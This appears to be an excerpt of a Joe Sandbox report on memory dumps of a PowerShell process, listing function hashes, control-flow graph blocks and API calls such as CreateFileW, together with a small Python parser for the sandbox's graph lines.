• Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
APIs
• CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0493AD07,00000000,00000000,00000003,00000000,00000002), ref: 0493AE12
Memory Dump Source
• Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0493AD07,00000000,00000000,00000003,00000000,00000002), ref: 0493AE12
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: c65b1eb145d9c37d81cec128b0614d5b89b5e87d93c8aba0a04da41d9fafdd64
                                                                                                            • Instruction ID: 0281f2d8a322fcdf433fb885260dd00dad527dab073014c7a114682bb40a8875
                                                                                                            • Opcode Fuzzy Hash: c65b1eb145d9c37d81cec128b0614d5b89b5e87d93c8aba0a04da41d9fafdd64
                                                                                                            • Instruction Fuzzy Hash: 9A2104B2D04259AFCF10CF9AD944ADEFBB4FB48314F14812AE919A7610C375AA54CFE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph (basic blocks with address ranges, then edges; the executed / not-executed colouring of the rendered graph does not survive as text)
                                                                                                            • Block 124: 4931240-493128a
                                                                                                            • Block 127: 4931292-49312bd (calls GetFileAttributesW)
                                                                                                            • Block 128: 493128c-493128f
                                                                                                            • Block 130: 49312c6-49312e3
                                                                                                            • Block 131: 49312bf-49312c5
                                                                                                            • Edges: 124->127, 124->128, 127->130, 127->131, 128->127, 131->130
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 0530389601d464ed6bfcf89240a0c61b7318e9ec9c39c2d28553837b805d1498
                                                                                                            • Instruction ID: 40fb799f411de02232ff5e4ce7c01798c6ee096893d1530e4b7464e414cfa9ba
                                                                                                            • Opcode Fuzzy Hash: 0530389601d464ed6bfcf89240a0c61b7318e9ec9c39c2d28553837b805d1498
                                                                                                            • Instruction Fuzzy Hash: B51112B1D006599BCB10CF9AD945B9EFBF8BB48324F10812AE819B3710D774AA44CFE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph (basic blocks with address ranges, then edges; the executed / not-executed colouring of the rendered graph does not survive as text)
                                                                                                            • Block 134: 49312e4-49312f0
                                                                                                            • Block 135: 49312a2-49312bd (calls GetFileAttributesW)
                                                                                                            • Block 136: 49312f2-4931374
                                                                                                            • Block 138: 49312c6-49312e3
                                                                                                            • Block 139: 49312bf-49312c5
                                                                                                            • Edges: 134->135, 134->136, 135->138, 135->139, 139->138
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 4b8e9d9ba1df875be05d7a9a72bde3b01290e423e889a6e1e3e882f95a97a583
                                                                                                            • Instruction ID: ea5bc12039fedf52d34389baffa877f8b581464b42c37df83b79cc804c9652ed
                                                                                                            • Opcode Fuzzy Hash: 4b8e9d9ba1df875be05d7a9a72bde3b01290e423e889a6e1e3e882f95a97a583
                                                                                                            • Instruction Fuzzy Hash: 21F02B71D083948FDB118BE998453D9FBF0FB0A359F04C19AD044E7261D378A445CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph (basic blocks with address ranges, then edges; the executed / not-executed colouring of the rendered graph does not survive as text)
                                                                                                            • Block 463: 72cf080-72cf08d
                                                                                                            • Block 464: 72cf09f-72cf0c3
                                                                                                            • Block 465: 72cf08f-72cf092
                                                                                                            • Block 466: 72cf33d-72cf34a
                                                                                                            • Block 467: 72cf098-72cf09e
                                                                                                            • Block 470: 72cf0c9-72cf0eb
                                                                                                            • Block 471: 72cf34b-72cf359
                                                                                                            • Block 474: 72cf36c-72cf397
                                                                                                            • Block 475: 72cf35b-72cf36b
                                                                                                            • Block 476: 72cf0f1-72cf111
                                                                                                            • Block 479: 72cf117-72cf16a
                                                                                                            • Block 487: 72cf170-72cf1a0
                                                                                                            • Block 491: 72cf1a8-72cf2e2
                                                                                                            • Block 513: 72cf2e4-72cf33c (call 72c9be0)
                                                                                                            • Edges: 463->464, 463->465, 464->470, 464->471, 465->466, 465->467, 470->471, 470->476, 471->474, 471->475, 475->474, 476->471, 476->479, 479->471, 479->487, 487->491, 491->471, 491->513
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c56ae889a3c4016b7f2aee1836523114a43a2506fb1a120ed43ac9992108f6f2
                                                                                                            • Instruction ID: 8f87dbc80689f40c97c67b9fb48568bbac5d5a9ba99ebbc6c25ae2244d2382bb
                                                                                                            • Opcode Fuzzy Hash: c56ae889a3c4016b7f2aee1836523114a43a2506fb1a120ed43ac9992108f6f2
                                                                                                            • Instruction Fuzzy Hash: 22918F383443019FE725AB349852B2E7BA3ABC6715F24456AE106AF3D1DEB5EC428750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
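Joe Sandbox renders each function's control-flow graph as a single text line: the word control_flow_graph, then for every basic block its numeric id and hex address range, optionally followed by the name of the API it calls (or "call <addr>" for a nested internal call), with "src->dst" tokens for the edges. When triaging many of these records it is useful to parse that line and ask whether the block that performs the interesting call (CreateFileW above, the call to 72c9be0 in the last graph) lies on every path through the function or only on some. The parser below is an added example written for this report, not Joe Sandbox code; the two graph lines embedded as input are copied from the CreateFileW record and the 72cf080 record above, and the function names (parse_cfg, must_pass_through, blocks_calling) are the example's own.

```python
"""Parse a Joe Sandbox 'control_flow_graph' text line into blocks and edges."""
import re
from collections import defaultdict

# Graph line for the CreateFileW wrapper at 0x493a644, copied from this report.
CFG_CREATEFILE = (
    "control_flow_graph 115 493a644-493addc 118 493ade4-493ae1f CreateFileW "
    "115->118 119 493adde-493ade1 115->119 120 493ae21-493ae27 118->120 "
    "121 493ae28-493ae45 118->121 119->118 120->121"
)

# Graph line for the function at 0x72cf080 (nested 'call 72c9be0'), copied from this report.
CFG_NESTED_CALL = (
    "control_flow_graph 463 72cf080-72cf08d 464 72cf09f-72cf0c3 463->464 "
    "465 72cf08f-72cf092 463->465 470 72cf0c9-72cf0eb 464->470 471 72cf34b-72cf359 "
    "464->471 466 72cf33d-72cf34a 465->466 467 72cf098-72cf09e 465->467 470->471 "
    "476 72cf0f1-72cf111 470->476 474 72cf36c-72cf397 471->474 475 72cf35b-72cf36b "
    "471->475 475->474 476->471 479 72cf117-72cf16a 476->479 479->471 "
    "487 72cf170-72cf1a0 479->487 491 72cf1a8-72cf2e2 487->491 491->471 "
    "513 72cf2e4-72cf33c call 72c9be0 491->513"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")


def parse_cfg(line):
    """Return (blocks, edges) for one control_flow_graph line.

    blocks: {id: {"start": int, "end": int, "calls": [str]}}
    edges:  list of (src_id, dst_id) in the order they appear
    A block is introduced by a decimal id followed by a hex range; any
    token that is neither an edge nor a new block annotates the current
    block (an API name such as 'CreateFileW', or 'call <addr>').
    """
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and _RANGE.match(tokens[i + 1]):
            rng = _RANGE.match(tokens[i + 1])
            current = int(tok)
            blocks[current] = {
                "start": int(rng.group(1), 16),
                "end": int(rng.group(2), 16),
                "calls": [],
            }
            i += 2
            continue
        if current is None:
            raise ValueError("annotation %r before any block" % tok)
        if tok == "call" and i + 1 < len(tokens):
            blocks[current]["calls"].append("call " + tokens[i + 1])
            i += 2
        else:
            blocks[current]["calls"].append(tok)
            i += 1
    return blocks, edges


def blocks_calling(blocks, name):
    """Ids of blocks whose annotations mention `name` (an API or 'call <addr>')."""
    return sorted(b for b, info in blocks.items() if any(name in c for c in info["calls"]))


def entry_block(blocks):
    """The block with the lowest start address is taken as the function entry."""
    return min(blocks, key=lambda b: blocks[b]["start"])


def must_pass_through(blocks, edges, block_id):
    """True when every path from the entry block to an exit block visits `block_id`.

    Exit blocks are those with no outgoing edge. The check walks forward from
    the entry while refusing to enter `block_id`; if any exit is still reachable,
    the call in `block_id` is conditional.
    """
    entry = entry_block(blocks)
    if entry == block_id:
        return True
    succ = defaultdict(set)
    for src, dst in edges:
        succ[src].add(dst)
    exits = {b for b in blocks if not succ[b]}
    seen, work = {entry}, [entry]
    while work:
        node = work.pop()
        for nxt in succ[node]:
            if nxt != block_id and nxt not in seen:
                seen.add(nxt)
                work.append(nxt)
    return not (seen & exits)


if __name__ == "__main__":
    for label, line in (("CreateFileW", CFG_CREATEFILE), ("call 72c9be0", CFG_NESTED_CALL)):
        blocks, edges = parse_cfg(line)
        for b in blocks_calling(blocks, label):
            print("%s in block %d (0x%x): unconditional=%s"
                  % (label, b, blocks[b]["start"], must_pass_through(blocks, edges, b)))
```

On the CreateFileW graph the call block 118 sits on every path (115 reaches it directly and via 119), so the open is unconditional; in the 72cf080 graph the nested call in block 513 is bypassed by the 463->465->466 and 463->465->467 paths, so the check reports it as conditional. The entry heuristic (lowest start address) matches these dumps but is an assumption, not something the report states.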

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f38e92f13d03d47f15a70a051eb4b5f84cd572e53f4029334abb20cb359f5702
                                                                                                            • Instruction ID: 0a19ccadd269cf4045fdc568fb29fb9320392fed92bee521859268323d572af8
                                                                                                            • Opcode Fuzzy Hash: f38e92f13d03d47f15a70a051eb4b5f84cd572e53f4029334abb20cb359f5702
                                                                                                            • Instruction Fuzzy Hash: 5D61AEB4A102059FCB14EFB8C4146AEBBF2EF89314F05862DE806E7391DB399C45CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04b2330a575bc360e9be54dfacc7e7cacad54e066ef2b8d073893e4cf43caeb9
                                                                                                            • Instruction ID: 221aee7e7d9eb89c3dfc12190716269d7d2d5621ec1511ccc703f88044e27bbb
                                                                                                            • Opcode Fuzzy Hash: 04b2330a575bc360e9be54dfacc7e7cacad54e066ef2b8d073893e4cf43caeb9
                                                                                                            • Instruction Fuzzy Hash: 7E416BB4A202059FDB14DFA8C444AEDBBF2AF99314F14862AE816B7390DB759845CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce95dc811f587213bd7deb130c35ed6c557be74a10e9f76ae3c2763e88f2dcef
                                                                                                            • Instruction ID: b654365958b83c60a328634f0c20f7fb72e56b7e9f48267bef0b8d4feb47e899
                                                                                                            • Opcode Fuzzy Hash: ce95dc811f587213bd7deb130c35ed6c557be74a10e9f76ae3c2763e88f2dcef
                                                                                                            • Instruction Fuzzy Hash: 162135B1D1465A9BCB10CF9AC94579EFBB4FB48320F00812AE818A3640D378A540CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8e76b46fa3824e484c03139e71272d73f448265201fa5badeefc14d7c66f48b
                                                                                                            • Instruction ID: baf0f2ce2584e2dae66709c5f63d8150f1e0e888fd31f2e2017a52cbd899c4f3
                                                                                                            • Opcode Fuzzy Hash: b8e76b46fa3824e484c03139e71272d73f448265201fa5badeefc14d7c66f48b
                                                                                                            • Instruction Fuzzy Hash: E401B5B1734A224BF720DA79D400BA273D8DB50361F04467DE98DCB691D766F8C08781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d9a565ed31e8869ae27e4f8c86e3ae169f1fd1d6c38ee40261e89cf25f635da1
                                                                                                            • Instruction ID: ea6bf8acf51606769acf7fd0ed5c6bae8c6640df053e61c8b71400af8601b51e
                                                                                                            • Opcode Fuzzy Hash: d9a565ed31e8869ae27e4f8c86e3ae169f1fd1d6c38ee40261e89cf25f635da1
                                                                                                            • Instruction Fuzzy Hash: CF2135B1C0065A9FDB10CF9AD9457EEFBB4BF48320F15812AD418B3640D374A940CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d174d6564716147333d522c7553c23a6d1e1690ead3242df31ee48706e8346d
                                                                                                            • Instruction ID: 5e50ccbbcb5b96dd75778dc19032840c7f27620fa757be74f7e8efa572e6cec6
                                                                                                            • Opcode Fuzzy Hash: 5d174d6564716147333d522c7553c23a6d1e1690ead3242df31ee48706e8346d
                                                                                                            • Instruction Fuzzy Hash: 2A01F5B16387128FF721CE25C400B6237E4DF51310F0946ADD885CB6A2D765FC84C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.398894479.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_c0d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7543ade0bb0a0f53f13e7b1c69ff058359535654c96a23b70ee76ea6eee0c4ad
                                                                                                            • Instruction ID: 88922cac5aa90a4489a7a5e3ab8108a70b544795e18a84592b56da949cb25d84
                                                                                                            • Opcode Fuzzy Hash: 7543ade0bb0a0f53f13e7b1c69ff058359535654c96a23b70ee76ea6eee0c4ad
                                                                                                            • Instruction Fuzzy Hash: E301406140E3C05ED7128B258C94B52BFB4EF43224F1980DBD9998F2D3C2695949C772
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.398894479.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_c0d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61b339762fb2cc61737498a94af8615a2243a9c3dfca240056e4ac190b6d6569
                                                                                                            • Instruction ID: 47b05f226f08dd3798b803b61d3e4918f913e3dda508c03074c104345735a68a
                                                                                                            • Opcode Fuzzy Hash: 61b339762fb2cc61737498a94af8615a2243a9c3dfca240056e4ac190b6d6569
                                                                                                            • Instruction Fuzzy Hash: 4101F270908380AAE7208A66CC84B66BBD8EF4132CF18C11AED5E4B2C2C3799945C6B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea115141def9ce6c436ca37d245bbeaee8f3703d82a6d936149d674892dfe7c7
                                                                                                            • Instruction ID: 4a5cb4c4abcb0c5f0277a7c1a7c203b85729f4d4fbc0692d3090b59200eca467
                                                                                                            • Opcode Fuzzy Hash: ea115141def9ce6c436ca37d245bbeaee8f3703d82a6d936149d674892dfe7c7
                                                                                                            • Instruction Fuzzy Hash: CAE026762106008FE310EB10E4413ADB3A2EBC8354F00C52ED15AC3641CF34A8469B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.431589631.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: caeffa36edd4218eb749334920197951b35e27ab83ec292a57185f2c0b6412f3
                                                                                                            • Instruction ID: 08f4863e445dc5d3584b3c6c936095e997fead72064a8328fa10714c95bdb92c
                                                                                                            • Opcode Fuzzy Hash: caeffa36edd4218eb749334920197951b35e27ab83ec292a57185f2c0b6412f3
                                                                                                            • Instruction Fuzzy Hash: 91E02C766245008FE720EB00E4413AEB3A6EBC8320F00893ED15AC3681CF75A84A9BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%